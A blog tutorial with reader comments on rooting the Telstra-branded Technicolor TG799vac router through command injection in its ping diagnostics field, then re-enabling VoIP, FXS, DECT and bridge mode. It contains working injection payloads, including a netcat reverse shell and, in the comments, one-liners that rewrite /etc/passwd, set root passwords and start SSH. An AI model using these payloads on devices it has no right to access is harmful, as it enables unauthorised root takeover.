Hacking the Technicolor TG799vac (and unlocking features!)

The TG799vac, known more commonly in Australia as the “Telstra Gateway Max”, is a very capable piece of equipment. It has 802.11ac, a VDSL / ADSL2 modem (meaning NBN FTTN compatibility), a DECT base station, 2 x FXS ports for analogue phones, and an FXO port.

They are supplied directly to Telstra, and as such carry Telstra branded firmware. There is no ‘generic’ firmware available that will just give you access to the modem as with any other device you would purchase. Personally, I think this kind of sucks: if you decide to use this device with anyone other than Telstra, you lose access to the VoIP functionality, the DECT base station and the FXO port. That was the motivation to crack into this device and re-enable as many features as possible.

By default, the IP address of the modem will be In this example, I use a desktop on

First, we have to exploit the web interface to get root access to the device. This is possible because of a flaw in the IPv6 address validation on the Ping & Traceroute page: the address is handed to a shell without being checked, so anything after a ‘;’ is run as a command on the device. This is good for us, because otherwise none of the rest would be possible.
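For contrast with the flaw just described, here is the kind of check the ping page was missing. This is an added example written for this post, not code from the modem’s firmware: a strict character allowlist for the target, plus passing it to ping as its own argument instead of splicing it into a shell string.

```shell
#!/bin/sh
# Added example, not code from the modem or the original post: a strict
# allowlist check for a ping/traceroute target, the validation the
# vulnerable page lacked.  Two defences are shown: (1) accept only the
# characters an IPv4/IPv6 literal or hostname can contain and bound the
# length, and (2) never splice the value into a shell command string; hand
# it to the tool as a separate argument.

# target_is_safe TARGET -> exit 0 if TARGET looks like a plain IP literal or
# hostname, 1 otherwise.  Anything outside the allowlist (';', '`', '$',
# '|', whitespace, quotes, ...) is rejected before the value nears a shell.
target_is_safe() {
    t=$1
    # Empty, or longer than a DNS name may be (253 characters), is rejected.
    [ -n "$t" ] && [ "${#t}" -le 253 ] || return 1
    # Only letters, digits, '.', ':' and '-' are ever legitimate here.
    case $t in
        *[!0-9A-Za-z.:-]*) return 1 ;;
    esac
    # Names and addresses never start or end with '-' or '.', and a leading
    # '-' would otherwise be read as an option by ping.
    case $t in
        -*|*-|.*|*.) return 1 ;;
    esac
    # If it contains ':' it must be an IPv6 literal: hex digits, ':' and '.'
    # (the latter for IPv4-mapped forms) only.
    case $t in
        *:*) case $t in *[!0-9A-Fa-f:.]*) return 1 ;; esac ;;
    esac
    return 0
}

# safe_ping TARGET -> runs one ping after validation.  The target is passed
# as a separate argv element, so even a value that slipped past the check
# could not become extra shell commands.  Returns 2 on a rejected target.
safe_ping() {
    target_is_safe "$1" || { echo "rejected target: $1" >&2; return 2; }
    ping -c 1 -W 1 "$1"
}
```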

Getting root access

On your desktop, open a listening port. Make sure your firewall allows inbound connections to it.
# nc -lvvp 10001

Now visit the ‘Diagnostics’ page on the modem, and click on the Ping & Traceroute tab. In the IP address section, enter:
:::::::;nc 10001 -e /bin/sh

If your modem doesn’t display the Diagnostics tile, you can use Firebug or something similar (F12 in Internet Explorer) to inspect the DOM of the main page of the modem GUI with all the “tiles” on it, and change one of the existing tiles (such as “Management”) from:

<div class="settings" id="Management" data-remote="modals/usermgr-modal.lp" data-toggle="modal" data-id="usermgr-modal"></div>

to:

<div class="settings" id="Diagnostics" data-remote="modals/diagnostics-xdsl-modal.lp" data-toggle="modal" data-id="diagnostics-xdsl-modal"></div>

Exit the DOM inspector and click on the “Management” tile as if you were entering the Management page. It should load the Diag page instead.

If all goes well, your modem will now connect to your desktop – and make available a root shell for you. NOTE: At this point, you won’t see any type of shell prompt, or error messages – so while you’ll get output of commands, it can get a little confusing.

First steps: change the root password (run passwd; the prompts below are its output) and get dropbear (the SSH server) to run on boot. NOTE the lack of prompt:

Changing password for root
New password:
Retype password:
Password for root changed by root
echo 'dropbear &' > /etc/rc.local

You should now be able to SSH into your modem on the LAN IP with the username root and the password you set above.

$ ssh root@
root@'s password:
BusyBox v1.23.2 (2017-02-08 14:47:26 UTC) built-in shell (ash)
  _______              __           __              __
 |_     _|.-----.----.|  |--.-----.|__|.----.-----.|  |.-----.----.
   |   |  |  -__|  __||     |     ||  ||  __|  _  ||  ||  _  |   _|
   |___|  |_____|____||__|__|__|__||__||____|_____||__||_____|__|
                 N E X T   G E N E R A T I O N   G A T E W A Y
  * 1 oz Vodka          Pour all ingredients into mixing
  * 1 oz Triple Sec     tin with ice, strain into glass.
  * 1 oz Orange juice
Product: vant-f_telstra
Release: Aqua (16.3)
Version: 16.3.7567-2521030-20170614084458-887a8c777ed8527277d7137ed9149816c889cf1d
Hash config:         887a8c777ed8527277d7137ed9149816c889cf1d
Hash openwrt:        ca2463af2522fc727150f23d6e85005112e8e8eb
Hash kernel:         b295f29cce441d87cef07373bfb07b546f720db3
Hash technicolor:    021884ac6200cd08635043046d33a717336a3554
Hash mindspeed:      91b6a7a4d703268d6023c3a58da3d33fc62e7ed8
Hash lte:            cf5c1319d7769c1b9e7721dfebcfe25e8cc1176f
Hash routing:        7b853f235ce96cd14f3abaebf9253c5ca7f72f7d
Hash custo:          85da3def73fee4e92f478d2b1afafdfc16235a81
Hash packages:       0f8aa1264d7a3bf6e4304f0f8ddfdabc4ddac7e4
Bootloader: 2.0.54

You’ll note straight away that the firmware is based on OpenWRT. This is always good – as it means that the majority of the OpenWRT configuration is applicable directly to this modem.

Disable software updates

A reader has written to advise that the exploit we used to get access to the modem is fixed in release 17.1. To prevent your modem from auto-upgrading, I suggest setting upgradesmanaged to '0' and commenting out the acs_url line in /etc/config/cwmpd, as follows:

option upgradesmanaged '0'
#option acs_url 'https://xxxxxxxxxx'

I also recommend disabling the service:

# /etc/init.d/cwmpd stop
# /etc/init.d/cwmpd disable
# /etc/init.d/cwmpdboot disable
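The same changes as a script that verifies its own result, rather than hand-editing. This is an added example, not from the original post; it assumes only the /etc/config/cwmpd lines shown above (option upgradesmanaged and option acs_url), and the service ordering follows a reader’s note in the comments about a watchdog that reboots the modem when cwmpd is stopped.

```shell
#!/bin/sh
# Added example, not from the original post: apply the cwmpd changes above
# from a script and verify them.  It assumes the OpenWrt-style layout of
# /etc/config/cwmpd shown above (an "option upgradesmanaged" line and an
# "option acs_url" line).  Any section header used in testing is a
# constructed placeholder, not the modem's real one.

# harden_cwmpd_config FILE
#   - keeps a copy at FILE.bak
#   - forces   option upgradesmanaged '0'
#   - comments out every active  option acs_url  line
#   Returns 0 only if the result verifies, 1 otherwise.
harden_cwmpd_config() {
    cfg=$1
    [ -f "$cfg" ] || { echo "no such file: $cfg" >&2; return 1; }
    cp "$cfg" "$cfg.bak" || return 1
    # Write to a temp file and rename, so the original is untouched if sed
    # fails part way (busybox sed -i would also work on the modem).
    sed -e "s/^\([[:space:]]*\)option upgradesmanaged .*/\1option upgradesmanaged '0'/" \
        -e "s/^\([[:space:]]*\)option acs_url /\1#option acs_url /" \
        "$cfg" > "$cfg.tmp" && mv "$cfg.tmp" "$cfg" || return 1
    # Verify: no active acs_url line may remain, and the managed flag is 0.
    active=$(grep -c "^[[:space:]]*option acs_url" "$cfg" || true)
    managed=$(grep -c "^[[:space:]]*option upgradesmanaged '0'" "$cfg" || true)
    [ "$active" -eq 0 ] && [ "$managed" -ge 1 ]
}

# Order matters when taking the service down: a reader reported (see the
# comments) a watchdog that reboots the modem when cwmpd disappears while
# still enabled.  Disable first, then stop, and expect one reboot; cwmpd
# stays down afterwards.
disable_cwmpd_services() {
    /etc/init.d/cwmpd disable &&
    /etc/init.d/cwmpdboot disable &&
    /etc/init.d/cwmpd stop
}
```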

Using bridge mode with dedicated PPPoE ethernet port

I use the AP on the device on my LAN, but I also use the modem purely in bridge mode, which means I want to dedicate a port to my router so it can do PPPoE to my ISP. Thankfully, standard OpenWRT config applies. I added a new bridge called ‘adsl_wan’ and added eth4, eth3, atm_8_35 and ptm0 to it:

config interface 'adsl_wan'
        option type 'bridge'
        option ip6hint '0'
        option force_link '0'
        list ifname 'eth4'
        list ifname 'eth3'
        list ifname 'atm_8_35'
        list ifname 'ptm0'

You’ll need to remove eth3 from the LAN VLAN. This puts the port right next to the WAN ethernet (that port is eth3; eth4 is the WAN port) on the same bridge as the VDSL/ADSL modem. I have yet to figure out how to get the WAN port itself to do this, as it seems to be configured differently, maybe at the switch level.

Enable web interface features

If you have the modem in bridge mode, the web interface is gutted compared to routed mode.

Edit /www/lua/cards_limiter.lua and change the following function to:

function M.card_limited(info, cardname)
  -- Display all cards, whether or not the modem is bridged.
  -- Lua only allows 'return' as the last statement of a block, so it is
  -- wrapped in do ... end; the original logic below is left in place but
  -- is never reached.
  do return false end

  if info.bridged then
    return not bridge_limit_list[cardname]
  end
  return false
end

Restart the web interface via: /etc/init.d/nginx restart

Configure a third party SIP provider

Edit /etc/config/mmpbxrvsipnet and use the following guide:

Under the heading sip_net, set:

  • primary_registrar to your SIP server – e.g. my.sipserver.com
  • primary_registrar_port to 5060
  • primary_proxy to your SIP server – e.g. my.sipserver.com
  • primary_proxy_port to 5060

Under the heading sip_profile_0, set:

  • user_name – your SIP username
  • uri – your SIP username
  • password – your SIP password
  • enabled – set to 1

Then restart the mmpbxd service via /etc/init.d/mmpbxd restart

If you have multiple SIP accounts to log into, with different providers, you can duplicate the entire sip_net section under a different name and configure it as above. Set the profile’s network setting to point to the new section you have created.

Enable the FXS ports

To enable the FXS ports, set the relay_state parameter to '1' in /etc/config/mmpbxbrcmfxsdev – e.g. for FXS port 2:

config device 'fxs_dev_0'
        option user_friendly_name 'Phone 1'
        option comfort_noise 'silence'
        option echo_cancellation '1'
        option fax_transport 'inband_renegotiation'
        option t38_redundancy '1'
        option rtcp_interval '5000'
        #list codec_black_list 'G722'
        #list codec_black_list 'AMR-WB'
        option cw_cas_delay '758'
        option fxs_privacy_reason 'P'
        option fxs_unavailability_reason 'O'
        option fxs_port '2'
        option cid_display_date_enabled '1'
        option cid_display_calling_line_enabled '1'
        option cid_display_calling_party_name_enabled '1'
        option pos '0'
        option early_detect_faxmodem '0'
        option relay_state '1'

SIP call routing

Each DECT device or FXS port can be registered against one or multiple SIP accounts. Look for the incoming_map section for sip_profile_0 and edit as needed. This is my setup to route sip_profile_1 to the first registered DECT device and FXS port 1:

config incoming_map
        option profile 'sip_profile_0'
        list device 'fxs_dev_0'
        list device 'dect_dev_1'
        list device 'dect_dev_2'
        list device 'dect_dev_3'
        list device 'dect_dev_4'
        list device 'dect_dev_5'
        list device 'sip_dev_0'
        list device 'sip_dev_1'
        list device 'sip_dev_2'
        list device 'sip_dev_3'
        list device 'sip_dev_4'
        list device 'sip_dev_5'
        list device 'sip_dev_6'
config incoming_map
        option profile 'sip_profile_1'
        list device 'dect_dev_0'
        list device 'fxs_dev_1'

Registering DECT handsets

After enabling all the ‘cards’ via the web interface, the easy way is to start DECT pairing via the web interface. Click on the Telephony card, then ‘Start’ the pairing and follow the instructions for your handset. This was straightforward for me.

Speeding up sync times

If you are on an NBN FTTN connection, it seems the modem still tries to sync using ADSL first. The default NBN FTTN profile is 17a, so we can disable the other modes and profiles in /etc/config/xdsl:

config xdsl 'dsl0'
        #list multimode 'gdmt'
        #list multimode 'adsl2annexm'
        #list multimode 'adsl2plus'
        list multimode 'vdsl2'
        #list profile '8a'
        #list profile '8b'
        #list profile '8c'
        #list profile '8d'
        #list profile '12a'
        #list profile '12b'
        list profile '17a'
        option enabled '1'
        option eoc_vendor_id 'BETMMB'
        option handshake_switch_timeout '0'
        option demod_cap_value '0x90447a'
        option demod_cap_mask '0x90447a'
        option demod_cap2_value '0x790000'
        option demod_cap2_mask '0x790000'
        option aux_features_value '0x1064003'
        option aux_features_mask '0x1064003'
        option vdsl_cfg_flags_value '0x1200e00'
        option vdsl_cfg_flags_mask '0x1200000'
        option xdsl_cfg1_value '0x0'
        option xdsl_cfg1_mask '0x0'
        option xdsl_cfg2_value '0x0'
        option xdsl_cfg2_mask '0x0'
        option maxaggrdatarate '160000'
        option maxdsdatarate '110000'
        option maxusdatarate '40000'
        option eoc_serial_number 'YeahRight 799vac 16.3'

Changing max sync speeds

In /etc/config/xdsl, you can change the maximum sync speeds. The value maxusdatarate controls the upstream maximum sync speed, maxdsdatarate the downstream maximum, and maxaggrdatarate the maximum combined speed. The defaults are listed above. This doesn’t change any limitations imposed by line length or at the DSLAM.

Serial Console

A serial console can be added using a 3.3V to RS232 adapter. These can be found on eBay quite cheaply. The serial console is J5 on the board, and note from the picture below that R327 and R328 need to be solder bridged to pass the serial signals to the adapter. In the pictures shown, Black = Ground, Yellow = RX, and Green = TX.

Update history

2017-09-02 – Initial revision of this document.
2017-09-07 – Add section to disable cwmpd to prevent pushed firmware updates locking us out.
2017-10-20 – Add workaround for diagnostics tile thanks to NetSicK.
2017-11-20 – Add serial console details thanks to Matt.



      • TeddyRaspin on September 4, 2017 at 5:22 pm

      Do you know how disabling this hack and turn back modem to its default status please ?

      1. A standard factory reset should restore everything.

        While the changes survive a reboot, they should not survive the factory reset.

      • TeddyRaspin on September 5, 2017 at 1:54 am

      Anyway on DGA4130 (Technicolor AGTEF) SSH is enabled but using WinSCP or Putty I always get “access denied”. It seems that even if it says “password for root changed by root” and enabled the dropbear (ssh server) via the echo ‘dropbear &’ > /etc/rc.local command, after the reboot process SSH is enabled but it seems to not accepting the root password I’ve inserted before and I don’t know why.

      Maybe my Technicolor modem requires more hacking tweaks. Could you help me please ?

      1. You might need to edit the file /etc/config/dropbear and allow it to use password auth.

        Mine looks like:

        config dropbear
                option enable '1'
                option PasswordAuth 'on'
                option RootPasswordAuth 'on'
                option Port         '22'
                option IdleTimeout '600'
        #       option BannerFile   '/etc/banner'
          • Dale on October 5, 2017 at 3:53 pm

          Also works on TG797n v3 (16.1), but instead of:
echo 'dropbear &' > /etc/rc.local

          To enable dropbear I had to edit the file /etc/config/dropbear, thank you.
          To do that I used the sed command to edit line 2, and then lines 3 & 4:
          sed -i '2 s/0/1/' /etc/config/dropbear
          sed -i '3,4 s/off/on/g' /etc/config/dropbear
          cat /etc/config/dropbear

      • Brian on September 7, 2017 at 10:37 pm

      Thanks for this….., Pity they fixed the exploit in the web pages in 17.1 but it seems I got to mine before any push happened.

      Stopped and disabled the update service, but it reappeared after reboot, so i mashed out the update URL with hashes like suggested
#option acs_url 'https://################################'

      1. I’m not sure there are any Telstra type modems with 17.1 firmware as yet. Of course, other countries may have a different story…

        • Greg on October 7, 2017 at 10:57 am

        The exploit comes from weaponizedautism.wordpress.com. He said he’d release more unlocking techniques if Technicolor fixes this one. Maybe leave a comment there somehow. I can’t find anywhere to comment.

    1. Can I also add just for the sake of the search engines that most of this also applies to the iinet / internode issued TG–789 VDSL modems?

      Can I also note that on the TG-789 at least that you can enable dropbear ssh by editing the /etc/config/dropbear file instead of adding to the /etc/rc.local file.

      *** dropbear.orig 2017-09-08 09:40:16.532696000 +1000
      — dropbear 2017-09-08 09:41:10.828503662 +1000
      *** 1,7 ****
      config dropbear
      ! option enable ‘0’
      ! option PasswordAuth ‘off’
      ! option RootPasswordAuth ‘off’
      option Port ’22’
      # option BannerFile ‘/etc/banner’
      option IdleTimeout ‘600’
      — 1,7 —-
      config dropbear
      ! option enable ‘1’
      ! option PasswordAuth ‘on’
      ! option RootPasswordAuth ‘on’
      option Port ’22’
      # option BannerFile ‘/etc/banner’
      option IdleTimeout ‘600’
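Review bot: the new block turns the service on and enables PasswordAuth and RootPasswordAuth in the same change, so root becomes reachable with a password on every interface dropbear listens on; add `option Interface 'lan'` to the new `config dropbear` block so the listener stays off the WAN side, and make sure the root password has actually been changed before the service comes up. Also, the quotes shown in the hunk (‘0’, ’22’) are typographic characters, so the block will not parse if pasted as is; UCI expects plain single quotes.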

        • LucIta on December 3, 2017 at 8:11 am

        In addition to llllloooooo instructions for TG–789 for the italian provider Tiscali to have ssh root login working you also need to modify the line referring to root user in /etc/passwd
        Otherwise you can’t authenticate after enabling ssh and changing root password

      • TeddyRaspin on September 10, 2017 at 7:58 pm

      It would be nice if someone finds out a new exploit on 17.1 to enable root access. I’ve now my modem fixed. 🙁

      • TeddyRaspin on September 15, 2017 at 9:03 pm

      Is there anyone who knows how switch from bank_2 to bank_1 ?

      My modem does not have telnet or ssh access. 🙁

        • MrMatthewM on October 9, 2017 at 12:11 am

        If you do a factory reset it may switch back to bank_1, a failsafe for a failed firmware update.

        I have not exactly confirmed this as 100% but I was watching the console after the update from 15.1 to 16.3 it had upgraded but I had lost access to the web interface (I got Internal server error) this may of been a failed firmware update but watching the console it was booting, so I held down the reset button for 10 seconds and after reboot it booted from bank_1 again and redid the firmware update to 16.3.

      • John Doe on September 25, 2017 at 9:25 pm

      It works also on TG789VAC V2 (16.3).

      /etc/shadow and /etc/config/dropbear changes survives in case of fw upgrade through CWMP or file is overwritten?

      1. I believe they would get over-written.

      • Brian on September 29, 2017 at 10:38 am

      Anyone know if this works on TG800VAC ?

      I can get the executed code to open a shell (Its saying connected), but its immediately dropping back to the Host prompt, not staying connected (i think). Any chance the TG800 is immediately dropping the session ?

        • Darren on September 29, 2017 at 11:13 pm

        I was able to perform the exploit on my TG800 no different from my TG799.

      • notmyname on September 29, 2017 at 4:04 pm

      the netcat connection didnt work for me.
      these steps did work for me:
      1. use this: :::::::;echo 'dropbear &' > /etc/rc.local to enable ssh through traceroute
      2. ssh root@
      3. (the hard part) had to brute force the password (jks, the password is root)

        • Frank on September 30, 2017 at 1:31 pm

        Excuse my ignorance, but not that savvy with these things. Downloaded netcat and couldn’t get to work. Any chance of expanding on the steps and simplifying in plain simple terms of what you actually did?

        • MrMatthewM on October 2, 2017 at 4:49 pm

        What firmware are you running? still 16.3 or 17.1

        I have been wondering if it would be possible for routers that have been upgraded to 17.1 Is to do a hard reset so the modem switches back to bank 1 then log in via ssh manually switch to bank 2 enable ssh on the 17.1 file system then switch back.

      • Chipsteroo on October 7, 2017 at 12:30 pm

      I had no luck with nc, because on 14.1 the nc command doesn’t support the -e option

      I ended up getting shell access using

      :::::::;dropbear &
:::::::;echo 'root:x' | chpasswd

      Then ssh into router as root with password = x

      • matt on October 7, 2017 at 7:20 pm

      A couple of notes from my recent attempts to do this:

      On a Mac running OS X 10.10 (Yosemite), the command to get netcat to listen is:

      /usr/bin/nc -l 10001

      Also might be worth noting that editing once logged into the modem requires the vi command (and knowing how to use vi) which isn’t explicitly stated in the tutorial above – eg:

      vi /www/lua/cards_limiter.lua

      My modem is still running v15.3 firmware – which greets you at the remote login with warnings about being prerelease and not for deployment. The change to enable all the cards in bridged mode locks you out of the web admin – the password is no longer accepted. sshing back in and commenting out removing that first added “return false” line returns the ability to log in.

      I’m not sure how much info Bridged Mode removed in later firmware, but on 15.3 it appears to be a fairly complete Advanced Settings version (with no simple mode option) – obviously a number of services are disabled, but going back to Routed Mode requires a factory reset, which I assume will wipe all the changes made?

      • Bogemon on October 26, 2017 at 11:12 am

      hello guys

      Just want to check if anyone found anything on doing this on 17.1. Looks like the ping box wont allow me to send it. gives a validation error now. . Any other way to do this?

      • Thisavros on October 29, 2017 at 1:04 pm

      Tks. ssh access worked for me.
      Got the FXS port up with continuous dial tone
      Entered the sip_profile details and maps but when attempting a call it fails after second digit.
      I note in the logs
      Sun Oct 29 11:48:10 2017 user.debug mmpbxd[7155]: [MMUCI] :E: mmUciCommonAllocateContext:248 – Error loading the UCI config from file for mmpbxbrcmsi3217x: UCI_ERR_NOTFOUND
      Sun Oct 29 11:48:10 2017 user.debug mmpbxd[7155]: [MMBRCM] :E: mmBrcmSi3217xConfigLoad:1872 – No Slic configuration is found. Endpoint Driver default config will be used.
      Sun Oct 29 11:48:10 2017 user.debug mmpbxd[7155]: [MMBRCM] :E: mmBrcmInit:590 – mmBrcmSi3217xConfigLoad has failed: MMPBX_ERROR_NOCONFIG

      Have I missed a config file?

        • Thisavros on November 2, 2017 at 11:41 pm

        Hey guys figured it out with some help from the AusiieBB help desk.
        After successfully root kit the router TG800vac Build 16.3.7567-660-RD
        I followed the above guide. Exception being that silly me used the IP address for the proxy & registrar

        After using the “case” sensitive fqdn: eg:
        Proxy Server: AussieBB.nms1.voice.wide.net.au
        Registrar Server: AussieBB.nms1.voice.wide.net.au
        Outbound Proxy: AussieBB.nms1.voice.wide.net.au
        Port: 5060
        VoIP is up and running.

        There are still many errors in the logs but I can make & receive calls.

        Thank you to CRCinAU

      • Sacha Weatherstone on October 30, 2017 at 6:27 pm

      I have the technicolor tg789vac v2 HP running firmware v16.3 (myRyrepublic) I have confirmed that the Ping RCE exploit still works (:::::::`halt` halts the system), The router also has ssh enabled by default but the password is unknown, but the main issue I am having is that I cannot get netcat working, I have confirmed the modem can ping my host but no netcat connection can ever be established, any ideas?

        • Sacha Weatherstone on November 8, 2017 at 7:57 am

        anyone got any ideas?

          • Geoff on December 5, 2017 at 9:28 pm

          I used MobaXterm on Win10 as it has nc command built in.
          Start a local terminal.
          nc -l 10001
          then in your modem do the ping and traceroute
          You wont see anything in MobaXterm but you can continue with the passwd change.
          I couldn’t get anything else to work but once I got MobaXterm and realised I wouldn’t see any responce it was easy.

      • Johnny on November 3, 2017 at 4:00 pm

      Does anyone know how to disable Telstra air. Can’t seem to find any mention of it throughout the router directories.

        • Johnny on November 3, 2017 at 4:22 pm

        /etc/init.d/hotspotd stop

    2. Hi I’m not that strong in router configuration. But I got my ssh running and all is well.

      I want my TG799vac just to be a modem, nothing else, I have a unifi USG gateway that will take care of all routing, firewall etc. but how do you get it in Bridge mode ? I made the adsl_wan as described but it doesn’t seem to take effect, in I missing something here 🙂

      • Will on November 5, 2017 at 10:36 pm

      I have managed to applied the hack.

      I am running the modem in Bridged mode. How can i allow the traffic on the modem connect to internet for the SIP/LAN/etc?

      • Jatz on November 7, 2017 at 1:56 pm

      If you apply this hack and setup a custom voip provider, can you use the Telstra t-voice 502 handset with the non-telstra voip?

      1. From what I understand, this is just a normal DECT phone – so it should work.

      • Jens TC on November 13, 2017 at 12:21 am

      Is it possible to install and use OpenVPN on the Technicolor. Release: Jade (16.2) ?

      • SwiftCookie on November 21, 2017 at 11:48 pm

      Yo, firstly does this still work? 🙂

      Secondly if it does, will this allow me to get any improvements out of my line with the sync speed fixes?
      So sick of the Telstra controlled modem but I need it to use Voip :/

      Been using a NetDuma R1 for gaming purposes, but it’s just running off the Technicolor via Ethernet.


      • theDarkPotato on November 22, 2017 at 7:19 pm

      My router is updated to 17.2 It is fixed

      • Oldtimer on November 26, 2017 at 9:01 am

      I have 15.4 and would like to get 16.3, but obviously i dont want to get 17+. Is there any way to accept the update and just store the firmware without actually updating so that i can update manually if i choose to do so?

        • geoff on November 28, 2017 at 7:26 pm

        You can download 16.3 from 16.3.7567-660-RG (TG799) size 20.81 MB

        Jailbreak Telstra TG799
        ssh into Telstra TG799
        scp the download 16.3 rbi file to /tmp/
        Run the command “sysupgrade -v /tmp/filename-of-downloaded-sysupgrade.rbi”
        Telstra TG799 will update and then reboot itself
        Jailbreak Telstra TG799 (required again after firmware update)
        lock Telstra TG799 down to prevent cwmpd updating to 17.x

          • Oldtimer on November 29, 2017 at 10:33 pm

          Thanks Geoff, but i dont have Vant-F i have Vant-W, is it still safe to do the firmware upgrade?

      • execcr on November 28, 2017 at 6:46 pm

      Could we have another exploit for the 17.2 firmware?

      • Vlad on November 29, 2017 at 2:57 pm

      Hi There,

      now that I have ssh access and all the above mods were done.

      Does anyone know how I can install net-snmp on the technicolor tg800?

      • ciciusx on December 1, 2017 at 9:30 am

      Hi how can I make wan port in Lan port? I have 789vac unlocked

      1. I haven’t found a way to do this as yet.

      • ciciusx on December 1, 2017 at 5:36 pm

      and to make personal password to enter in remote on modem?
      and to put USA instead eu for wifi 2,4Ghz?

      • niko on December 5, 2017 at 6:05 am

      Could anyone post the contents of the keys in /proc/keys for this router?
      To do so just run the following command from the root shell:

find /proc/keys -type f -exec sh -c 'echo $0: $(cat $0)' {} \;

      • Geoff on December 5, 2017 at 9:33 pm

      Excellent Post thanks. I was able to SSH into my TG789vac v2 Firm ware 16.3.
      When I SSHed in my splash screen had a big red warning on it saying
      “Demo build, unofficial Technicolor SW, not suitable for deployment!”
      Not sure whether to laugh or be worried. 8-(

      I also closed port 3005 which was open with this command:
iptables -D zone_wan_input -p tcp -m tcp --dport 30005 -m comment --comment Allow_CWMP_Conn_Reqs -j ACCEPT

      Thanks again

      • Dennis on December 6, 2017 at 7:30 pm

      For TG797n V3 (V15.1), got it to work using a variant of a previous post:-
:::::::;dropbear & echo 'root:x' | chpasswd

      Then, ssh root@ using password x.
      Then, i changed root password using ‘passwd’.


      • Dennis on December 11, 2017 at 5:14 pm

      From previous tests before, i remember that PPPoE is only allowed on the ADSL port…
      Anyone try or have it working to get PPPoE on the WAN port?


        • Dennis on December 15, 2017 at 10:15 am

        Answering my own question….
        File : /etc/config/network
Change: interface 'wan' from option proto 'dhcp' to 'pppoe'

config interface 'wan'
option proto 'dhcp'
config interface 'wan'
option proto 'pppoe'

          • Dennis on December 15, 2017 at 1:18 pm

          One other thing to do:-
          Need to disable wansensing…. wansensing changes the “wan” interface back to DHCP after link down/up…

config wansensing 'global'
option enable '0'    <------- '1' to '0'
          option autofailover 'readonly'
          option initmode 'L2Sense'
          option l2type 'ETH'
          option l3type 'L3Sense'

      • Wayne on December 15, 2017 at 8:22 am

      Anyone successfully done a MyRepublic TG789 ?

      I can do the iinet/Internode TG789 with my eyes closed and hands tied behind my back but the MyRepublic branded one is giving me the s…s!

        • Nicholas on December 22, 2017 at 6:01 pm

        No idea but I would also really appreciate to know. It seems the exploit still works on the installed firmware version (managed to send a message though), however I couldn’t get the root shell over netcat to work no matter what I tried…

          • Wayne on December 24, 2017 at 5:56 am

          The root shell never opens on the MyRepublic one it does on the iinet/Internode one so I know my software is no the issue. They only difference I can see is that the iinet ones run VANT-6 firmware and the MyRepublic ones run VBNT-L although pull both apart and the boards are identical with all the same chips. I have even tried TFTPD to flash the VANT-6 firmware onto the MyRepublic one and it will not take. Keep on trying different things eventually it will tumble.

      • Paul Smedley on December 26, 2017 at 8:37 am

      Hi All – anyone been successful adding a 2nd SIP provider? Everytime I try it here, mmpbxd fails to restart. Would love a copy of someones mmpbxrvsipnet (with passwords hashed out) to try and use here

      • Daniel on December 26, 2017 at 1:56 pm

      This is an amazing tutorial. I’m running the older Technicolor TG797n v3 which is just a standard old ADSL modem. Do you, or anyone else know of any guides to unlock this modem? The current feature set is trash.


      • gja on January 5, 2018 at 8:41 pm

      Extra trivia for anyone doing this to an Internode-supplied TG789vac v2 modem running v16.3 and following the steps above for disabling cwmpd.

      There’s a watchdog daemon keeping an eye on cwmpd, which reboots the modem some tens of seconds after the cwmpd process is initially killed with “/etc/init.d/cwmpd stop”. (See see /etc/config/watchdog.)

      So be prompt with the additional “/etc/init.d/cwmpd disable” and “/etc/init.d/cwmpdboot disable” steps and cwmpd will not come back up after the reboot. (The watchdog wont subsequently complain about cwmpd never coming up, it only cares if cwmpd starts and then goes away.) But it can be a little unnerving having the ssh connection die for no apparent reason after stopping cwmpd 😉

      Probably better to do the two disable steps first, then stop the running cwmpd. Wait a minute for the reboot to happen, then log back in and continue your merry hacking…

    3. hello,
      on firmware 17.1 there is a possible exploit with the domain field of the dydns tile.

      • Mark on January 10, 2018 at 10:28 pm

      Has anyone had any luck with the myrepublic version TG789vac v2. I feel as though this is excellent hardware that can do so much more if it could only be unlocked.

      • Mark on January 10, 2018 at 10:34 pm

      Could someone please post the path of USB mounted drive. I’d like to try to run a few scripts from a USB stick using the exploit to try and add a user to ssh.


      • Wayne on January 13, 2018 at 12:53 pm

      The guys on Whirlpool worked out how to do the MyRepublic TG789vac
      So this is none of my work so don’t thank me goto Whirlpool and thank them but I have confirmed it works and it does not survive a factory reset but does survive a on/off reset.

      Ping this first after you change what password you want (all on one line)
:::::::;sed -i 's#root:/bin/false#root:/bin/ash#' /etc/passwd;echo "root:yourpasswordhere"|chpasswd;dropbear -p 6666 &

      login into port 6666 via ssh and edit the following file (WinSCP under windows with SCP protocol works great to do this)
      option RootLogin ‘0’
      option RootLogin ‘1’

      save & exit and restart the router then login to port 22 like normal

      • Joe on January 14, 2018 at 6:55 pm

      I have a MyRepublic TG789vac

When I enter into the IP address for the ping = :::::::;sed -i 's#root:/bin/false#root:/bin/ash#' /etc/passwd;echo "root:yourpasswordhere"|chpasswd;dropbear -p 6666 &

      and change my password in the above text for this example to “test”
      After I SSH to port 6666 I get a reply ” login as” which I input “root”
      and then I type the password “test” as for my example

      It will not recognize the password

      Have disabled my firewall fully to allow port 1001 thru .
      Do I need to have Ipv6 state turned on in my Router . I have it turned off because My republic does not use Ipv6. I turned Ipv6 back on and made no difference.

      I can can SSH to the router but it wont recognize the password for root

      What am I doing wrong ?

      • Wayne on January 15, 2018 at 5:40 am

      Not sure but I reset mine to factory defaults before I started to get rid of any changes I had made and did not have a problem. make sure you have root:test.
:::::::;sed -i 's#root:/bin/false#root:/bin/ash#' /etc/passwd;echo "root:test"|chpasswd;dropbear -p 6666 &

      • Joe on January 16, 2018 at 3:57 pm

      Thanks Wayne , I tried cutting and pasting your line just in case I made a typo in my previous attempts but I am still getting the same results where I get the logon prompt which I input “root” and then I enter the password “test” but it still comes up with the message “ACCESS DENIED” and gives me the prompt to re-enter the password again.
      I will try your tip and reset back to factory results and see if that makes any difference .

      • Joe on January 16, 2018 at 5:01 pm

      Ok , I just did a Factory Reset and it still does not work.
      Will keep trying

        • Wayne on January 17, 2018 at 7:28 am

        What version is your bios? If it has been updated it won’t work

      • Joe on January 17, 2018 at 1:16 pm

      Full Stats on the model I’m trying to upgrade are :

      MediaAccess TG789MYRvac v2 HP
      Software Version = 16.3
      Firmware Version = 16.3.7190-2761005-20161004084353
      Firmware OID = 57f34fa94f5105213973abd5
      Bootloader Version = 2.0.89
      Bootloader OID = unknown
      Hardware Version = VBNT-L
      Serial Number = CP1714VAE7H
